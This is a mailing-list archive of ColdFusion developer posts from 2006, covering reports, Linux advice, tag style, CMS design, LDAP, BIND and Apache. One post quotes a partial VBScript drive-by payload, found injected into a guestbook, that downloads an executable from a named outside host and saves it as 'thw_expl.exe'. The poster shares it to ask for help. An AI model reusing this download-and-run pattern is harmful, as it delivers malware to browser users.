re:

Thanks to Dirk, Brad and Kevin for their help on this.
Patching the server and bringing CF up to release 7.0.2
seems to have solved the problem.

Unfortunately, the forms load so slow I am not sure we
are going to be able to use Flash forms. Too bad.

Dunno. Hardly ever use IE, cept to test stuff I develop... anyone with
IE wanna test it out and see what happens? ;)

I installed 7, but due to a horrible ms-office update error, all MS stuff
is pretty messed up. Notepad is ok, but wordpad is hurting. Don't
ask about anything more complex than wordpad.

The joys of systems that are unlike those on the one surving battle-

I slapped Canvas up a few weeks ago... just played with it, but I enjoyed
my time (and the look and feel).

My Big Plan is to (someday) link it in with some bug/project tracking stuff,
and use the SVN java whatnots to tie into Subversion... but sh, it's
kinda hush hush. If anyone takes the idea and runs with it, please make
it an open source project, k?

=-P Oh, and Ray, I've got some old patches that I meant to send you
that probably won't work now, for blogCFC, that eliminates the need for
whatever those two commands that some people on shared hosting
can't run (reading and writing to the conf file). Well, it makes them
optional.

As a side, I wish more projects were set up like fckeditor, where you
can specify external locations for style sheets and whatnot... it's a
pain to have to copy out all your changes, copy over them with a new
version, and then copy your changes back in. Patch files make it a
little easier... but still... if you can sorta "plug" something in, it's nice
to be able to plug in where you plug in, so to speak.
Like with model glue, I've got my "actionpacks" outside the MG core
folders, so upgrading is much easier, etc..

Just something to think about, project people. I'm stoked these are
here for me (or us), don'cha know. =)

I've used it for reverse engineering a database, but haven't tried the other

It worked pretty good... for what I was doing, open source alternatives
worked just as good for making a ERD. I think Clay DB modeling or
something like that worked ah'aiet (it's an eclipse plugin).

Re: ColdFusion (sub)report woes

2006-10-27 Thread Silly Pinguin
It's been a long time since this was posted...

I will post a reply just for the sake of those who may be looking for it in
future.

I had the similar symptoms on CF 7.0.2 - the report contain subreports
would hang, whereas they all worked fine separately.

In the end I found out that CF hangs if the resulting length of the
subreport is longer than the height of the containing section (Detail, in
my case). Suprisingly - at least to me, who is used to MS Access - the
section does not grow automatically, so it appear you have to allow enough
space for all subreport data from the beginning.

Regards,
Silly Pinguin.

If you are looking for a stable and reliable Linux version for your
server, I would definitely suggest Debian.

If you are new and want to try and learn Linux and test CF on a
Linux box, go with Ubuntu.

If you are looking for online documentation and quick tutorials,
there are tons of it but you can also check http://howtoforge.com

We run some of our Enterprise things on RH 3 & 4 and we are moving more
over. Best way I found to learn was doing it grab an old pc hit
centos.orgdownload the ISO's and hammer away. Many of your questions
can and will be
answered via google.com

As for books I am partial to the O'Rielly books

RE: weird VB exploit

2006-10-27 Thread Munson, Jacob
You lost me. Are /you/ trying to run this VB script? If not, why do
you care about /your/ version of IE, it's the spammers browser (or spam
tool) that matters.

Ok, after a reread, I think I understand better. The spammer posted
some code that included an iframe. When you load your guestbook in IE,
you get a bunch of virus warnings. Do I have it right?

Re: Image CFC "Image Object"

2006-10-27 Thread Chris Peters
I figured out that objImage needs to be of type java.awt.image.BufferedImage.

If you are given an image via the CF "binary" type, you need to do this:

1. Write the binary value to a temp file with .
2. Use a java.io.File instance to read the new file.
3. Feed the instance of java.io.File to an instance of javax.imageio.ImageIO.

You then can pass the instance of javax.imageio.ImageIO as the objImage
parameter in image.cfc's methods.

Whew!

Also depends on what you need the wiki for. You can install trac, which

SVN integration, bugtacking/ticketing system and wiki all in one. It's
no
written in CF (python), but I've been able to do small changes to the

RE: CF Wiki

2006-10-27 Thread Russ
If you have a intel core 2 duo processor and enough ram, you can always run
linux in a virtual machine... with Core 2 Duo's Intel Virtualization
Extensions, the VM instance doesn't take up any extra CPU that it needs to,
and linux can be made to run well on as little as 256mb of ram.

It's not a book, but I really appreciated linuxcommand.org. The command
line in linux is where a lot of the power of Linux comes from. If you
understand how to use the command line, then you're most of the way to
becoming a good Linux system administrator. (The other half is
understanding the servers you're working with, how you want them to
work, etc.)

As someone who uses Linux exclusively for everything, I'd highly
recommend that web site.

I was curious to see if HS had a config file...and the file are kept
in...
C:\Program Files\Macromedia\HomeSite+\Extensions\CodeSweepers
but the one for tidy is just for HTML...there are also config files for
the CF codesweeper, but they are .vtm files, and don't seem to
correspond to standard tidy commands, so perhaps HS is using something
other than tidy for the CF sweeping. I would search the tidy mailing
list archives and see if someone has a good one...

RE: visual tool to display table relationships

2006-10-27 Thread Munson, Jacob
2 comments. 1st, you can also use MS Visio for this, but I agree that
Enterprise Manager's database diagrams are usually adequate (I've never
used Visio for this, but I hear it's pretty cool). 2nd, these tools
work a lot better if you have primary/foreign key's and with
constraints. The tool will look for that and use your constraints to
map the DB.

RE: CF Wiki

Aah, you beat me too it Barney. Even though I think you /should/
install a *nix box, even for running CF (I'm going to run and hide after
that comment!)...it's true that you can put PHP on Windows.

Re: Closing single CF tags like XML/XHTML

2006-10-27 Thread Barney Boisvert
There is no official statement. As you point out, using a self-close
for tags without bodies helps IDEs do their job better, and it also
makes reading code easier (because you know whether there's a closing
tag to come or not - CFHTTP is a perfect example).

The only place that it makes a difference is with custom tags. A
self-close is semantically equivalent to an open tag followed
immediately by a close tag, so your custom tags will run for each
execution mode. If you don't use a self close (nor a closing tag),
your custom tag will only run for the "start" execution mode.
However, best practices say your custom tags should eliminate the
distinction (either by ignoring an unneeded closting tag or by
requiring one to be present) in the implementation.

If your fellow developer insists on removing them, you need to have a
talk. Senseless reformatting of source is a really bad habit to get
into, if for no other reason than it makes for a lot of collisions in
source control. Even better would be coding standards that everyone
adheres to, but at the very least, "write your code how you want, but
don't reformat other's code."

cheers,
barneyb

Aha! I knew I read it somewhere semi-official (although I admit these are just
suggestions):

http://livedocs.macromedia.com/wtg/public/coding_standards/style.html

Macromedia's own coding standards guide:

[snip]
ColdFusion source code cannot quite be written to be purely XHTML-compliant
because of certain tags (cfif / cfelse, cfreturn, cfset) but you should make an
effort to be as XHTML-compliant as possible ... This makes the source code more
consistent (across CFML and HTML) and will also help you avoid subtle errors
such as unterminated nested cfmodule calls.

Re: Closing single CF tags like XML/XHTML

2006-10-27 Thread Jeff Guillaume
Christian Cantrell posted a survey about this in 2003...

http://weblogs.macromedia.com/cantrell/archives/2003/05/closing_tags_wi.cfm

I especially liked Samuel Neff's comments, as they echo my own beliefs (since
we're all supposed to be coding in XHTML - or will eventually - which requires
closing all tags, why not do it in CF for consistency?):

[begin quote]

I think that we are all creatures of habit. If you have a standard operating
Proceedure (SOP) for any development, you should stick with it. Usuing XHTML
standards when you are creating html, but not using it when "CF'ing it", will
only lead to confusion. It won't be long til you will have spent a week working
on CF and then build a couple dozen pages in stright html and you'll forget to
close your html tags.

I also think having a strict standard for tags helps reinforce HTML & CF
development as a true structed programming exercise. Also, IMHO I think that if
you are training more junion programmers, you should teach them a standard they
can use throughout your apps., AND prepare them for XML-centrict issues later.

[end quote]

Coldfusion resembles HTML but it's not HTML. Closing your tags like that
should be just personal preference as I've never heard or read anything
that says they're required. They're obviously not (in 6.1) or none of my
code would run.

Rick, if it makes the decision simpler, keep in mind that CFMX7 apps should
run under Scorpio (when it ships) with zero changes. In fact, the alpha thus

Like I said in an earlier post...extensible. It's absolutely
incredible how much functionality is provided for Apache. And at no
cost. You just can't beat that.

Problems with CFContent download of .tif image

2006-10-27 Thread Dawn Sekel
I am using the following code to retrieve a tif image from our internal imaging
server so that I can allow Internet users to retrieve blueprint drawings that
are behind our corporate firewall.

http://myurlname.asp?imagename";
   >

This code works great except for one problem. When the Windows dialog box
opens and says "Do you want to open or save this file?" in XP professional
clicking the save button works every time. But if the Open button is clicked
we can see the file downloading to the temporary folder -- but as soon as it
finishes the file disappears. And when Microsoft Office Document Imaging (the
default viewer) launches it give an error opening document message because the
file no longer exists. This only seems to happen on XP Professional--computers
with XP Home Edition or non-XP operating systems can open the file on the fly
by clicking the open button.

Does anyone have a clue why XP is doing this? It is also putting a (1) after
the file name and the other operating systems don't do that. Is there anyway
to stop it from deleting the file so the user can open it? Thanks in advance
for any advice.

C:\Program Files\Macromedia\HomeSite+\Extensions\CodeSweepers
but the one for tidy is just for HTML...there are also config files for
the CF codesweeper, but they are .vtm files, and don't seem to

other than tidy for the CF sweeping. I would search the tidy mailing

weird VB exploit

2006-10-27 Thread Brad Wood
Hey guys, I just got some spam posts on my guestbook which include an
iframe. Inside the iframe a page is called which, after calling about
80 unescape JavaScript functions tries to execute the following VB code.
I realized it when my antivirus started going nuts telling me about
executable files it was trying run.

Do I need a patch for IE? (IE 6.0 on Windows 2000 SP4) I didn't think a
web page could execute arbitrary files from a web server.

 On Error Resume Next

 Function h2s(s)

 Dim i

 For i = 1 To Len(s) Step 2

  h2s = h2s & Chr("&" & "H" & Mid(s, i, 2))

 Next

 End Function

 sFileURL = "http://money24online.com/file.exe";

 sFileName = "thw_expl.exe"

 Set DF = Document.createElement("object")

 Call DF.SetAttribute("classid", h2s(sClassID))

 Set AdoSream = DF.CreateObject(h2s(sItem_1), vbNullString)

 Set FS = DF.CreateObject(h2s(sItem_2), vbNullString)

Also depends on what you need the wiki for. You can install trac, which has
SVN integration, bugtacking/ticketing system and wiki all in one. It's no
written in CF (python), but I've been able to do small changes to the code
with no problems and it's fairly customizable without doing any code

Biggest concern is it needs to be highly customizable in its look and

PDF Label maker

2006-10-27 Thread Dave Hatz
I came across a custom tag last year called LabelMaker. Pretty slick little
tag. Send the tag a query result set and it produces an Avery label PDF
page. The guy that created the custom tag was Steven Klepzig. The old
email address we have for him is no longer valid.

I don't remember where we downloaded this from. Has anyone else used this
Custom Tag from Steven? Or do you know how we can get a hold of Steven?

Thanks,
Dave Hatz

Rick, if it makes the decision simpler, keep in mind that CFMX7 apps should

Hello,
I'm doing a ldap query and I'm running into a weird issue. If I use the
FQDN "ldap.llnl.gov" it does not work ("Connection to LDAP Server

work with using a FQDN since I'm connecting to another directory using
the name not the IP.

Has anyone seen this and if so how did you fix it?

But seeing as how CF8 is only in Alpha, if you buy 7 right now you'll need
to buy an upgrade to 8 some time next year.

Well, you could buy the 2 year subscription that will include any upgrades
that come along in those 2 years. The subscription costs considerably more
then one copy of CF, but noticeable less then the price of two.

we've spent a lot (understatement) of time and effort rolling our own CMS,
which allows the client to add their own menu items, pages, galleries,
mailing lists, etc. It runs from a core set of files, but each site has its
own database and CSS, for a start. And we can add additional functionality
to each site by means of a master database etc. This means we can set up a
site within a couple of days, depending on the design, and the basic site
structure is all scripted, so a simple batch file on the server does pretty
much all of it.

it's paid for itself over and over, in terms of quick response, and fast
support, and I'm really glad we did it. It doesn't fit all clients, but it
makes a good jumping off point for most of them.

Yeah Rick, that about does it.

Everything for the most part is tied into their client id. When they edit
their content they don't actually see it as it would live on the page but
that is of course another route you could follow where you select the
template you are going to use for a piece of content from with a particular
page. Paperthin goes this route same as Microsoft CMS, where you actually
click edit page and it brings you into an editor mode looking at the page
but now with text boxes surrounding the editable content.

We still need to initially setup where the includes fit in their site and
maybe make a change to their Navigation and site-maps to include a new file
but these items take minutes to complete and it might take 1 to 3 years
before the client actually requests a change to the nav. structure meaning a
new page so it's all good on that front. I say we are saving static html
files but of course our websites are either saved as .asp or .cfml so we
can use includes.

LDAP Weidness

2006-10-27 Thread Charles E. Heizer
Hello,
I'm doing a ldap query and I'm running into a weird issue. If I use the FQDN
"ldap.llnl.gov" it does not work ("Connection to LDAP Server failed"). But,
if I use the IP it works fine. Now, I know cfldap can work with using a FQDN
since I'm connecting to another directory using the name not the IP.

Has anyone seen this and if so how did you fix it?

Thanks,
- charles

Guys (and gals), I apologize. It seems a lot of you were trying to RSVP in
within an hour of the preso. Aaron (trajiklyhip.com, head of the UG, and my
boss) would have been a) in traffic to the meeting site, or b) setting
things up for the preso. He probably didn't even think of checking his email
again. This is our second Breeze (Adobe Acrobat Connect Professional)
presentation, and my first presentation period, so we're still learning
here.

The good news is that the preso was recorded, and is available online either
at my blog (http://blog.cutterscrossing.com) or the Nashville CFUG site

Again, sorry for the confusion. We'll try to get this a little closer to a

In BIND you can set the bind.conf file to only allow certain IP address to
be able to initiate a recursive query.

The directive is in the options section:

options {
  directory "c:\bind\etc";
// version statement for security to avoid hacking known weaknesses
  version "not disclosed";
// disables all zone transfer requests except for local network
  allow-transfer{12.199.124.0/23;};
  // Allow anyone to query
// only allow the local net to issue recursive queries
  allow-query {"any";};
  allow-recursion {12.199.124.0/23;};
};

There are several CMS applications that use a similar approach. Red-Dot for

It makes things like updating a global naviation link a real pain :)

No, actually I think there's one other fellow in Tibet who is still using
it, but I haven't heard from him in awhile... ;o)

Let's see if I've got my brain wrapped around your approach (in the simplest
terms)...

- Client has static html pages, which utilize includes for content

- Client updates content (images, text, etc.) and that content goes
into your database (connected via Primary Key to Client)
(This may be incorrect, because you publish entire html pages,
not just pieces of content from a database.)
Are the clients using your CMS for determining every part of their
web pages? As in "Choose your top graphic", Choose your first
image on the page", "Enter your heading for this page", etc.

- If they are choosing every piece of data to be displayed on an
an HTML page, I could see where you could use includes to create
HTML pages from storing that data in your database, then using
includes to create the static pages. If they aren't choosing every
piece of data, then I guess you have templates which make it
possible for them to change only certain pieces of data o the pages.

- Is my understanding anywhere in the ballpark?

- I thought about creating CMS areas where a representation of the
page the client is working on is presented, then they just click on
an element on the page (after I've designed the page, initially) that
they want to change and they are taken to a form which they will use
  to change the element.

- I think your system adds an extra layer to prevent constant database
access. You use your database to identify appropriate data, then
use CF code to place that data in appropriate files (XML?) and images
in appropriate directories, which then acts as static content for the
clients' websites, until they make further changes. Anywhere near
  accurate?

- Sounds like a very interesting way to create static sites from
database-driven
content, that eliminates much of the database activity. Is that the main
  purpose of your system?

- The approach I'm considering would do the same thing, it seems, but would
still utilize the database directly for dynamically providing content for
sites.

- You create a middle layer of code for turning

that data into static html (updateable
  by your client) code...right?

Thanks for your time and feedback...

Rick

We store their content of a page in our database and when it comes time to
publish the page, we then take that content and create a static html files.
When they add pictures and files, we place them in a directory initially on
our server and when they publish the CMS page, we re-write the locations of
these files in the saved html page so they match the directory structure of

RE: URL for CF7 Multi-Server configurations

2006-10-27 Thread Russ
+1. The things I can do because of mod_rewrite and mod_proxy alone are
worth using apache. IIS should technically be faster because it runs as a
kernel process, I believe, but these days it doesn't matter. As was said
many times, both apache and IIS can saturate the network connection using
any recent pc. The performance is really going to depend on the backend
tool you use, and if you don't use .NET, there is no point running IIS.
Apache is FAR more configurable, and has a lot more FREE modules that let
you do amazing things.

For example: Let say you want to have your development server available
externally, over port 80. Your isp blocks port 80. How would you solve
this with IIS? With apache you can just set up a virtual site on your
production server and have it proxy the content from your dev server over a
different port.

we've spent a lot (understatement) of time and effort rolling our own CMS,
which allows the client to add their own menu items, pages, galleries,
mailing lists, etc.

Re: Constructing multi-user/multi-site applications...

2006-10-27 Thread Casey Dougall

I say we are saving static html
files but of course our websites are either saved as .asp or .cfml so we
can use includes.

piece of data, then I guess you have templates which make it
possible for them to change only certain pieces of data o the pages.

Rick

PS - Hey, Adobe! If I upgrade to CF 7 now, can I get a free upgrade to
CF 8 when it's available?

We store their content of a page in our database and when it comes time to
publish the page, we then take that content and create a static html files.
When they add pictures and files, we place them in a directory initially on
our server and when they publish the CMS page, we re-write the locations of
these files in the saved html page so they match the directory structure of
their webserver. Now cfftp opens a connection and sends all the goodies
over to their website. These files are then ready to be included in their
template file, normally as an include.

Database drives the admin area. Who has access to what pages, what
galleries, and what applications overall so we can turn on or off
functionality depending on the domain and the user. When the user commits
their changes we are publishing this database content as static which means
the client needs very little to run these pages on their web server.

Events run slightly different. We create an xml style sheet on their server
and feed the events list from our server.

Their are still projects we need to exclude from this type of setup but for
the most part it works for 3/4's of the projects. Everything else would be
100% custom.

I also find Apache is faster and more reliable. We use IIS at our company
but that is due to our links with Microsoft, I would happily move to Apache
if I could!

I run both locally for testing etc.

Re: Image CFC "Image Object"

2006-10-27 Thread Jake Churchill
You are correct, this is the object in memory. If you are going to do
one simple operation, it's easier to just call the appropriate method
like resize() and pass the file paths. If you are doing a bunch of
things, retain the object in memory and just pass the object. This will
speed up the process because it will not read/write to/from the disc for
each operation.

Reading the source code, it's a java.awt.image.BufferedImage:

It's returned as part of the struct from many of the methods.

I'm like 90% positive that objImage. would allow you to continue to work
with the image in memory before saving it to disk. If you are performing
additional operations you would to them in succession, then save the final

Hmm I disagree on both accounts I Doug

- Peter was saying that the syntax was invalid and not fit for the
situation not just that you don't need an operator - which isn't true

interpreting this wrong from what Alex is saying
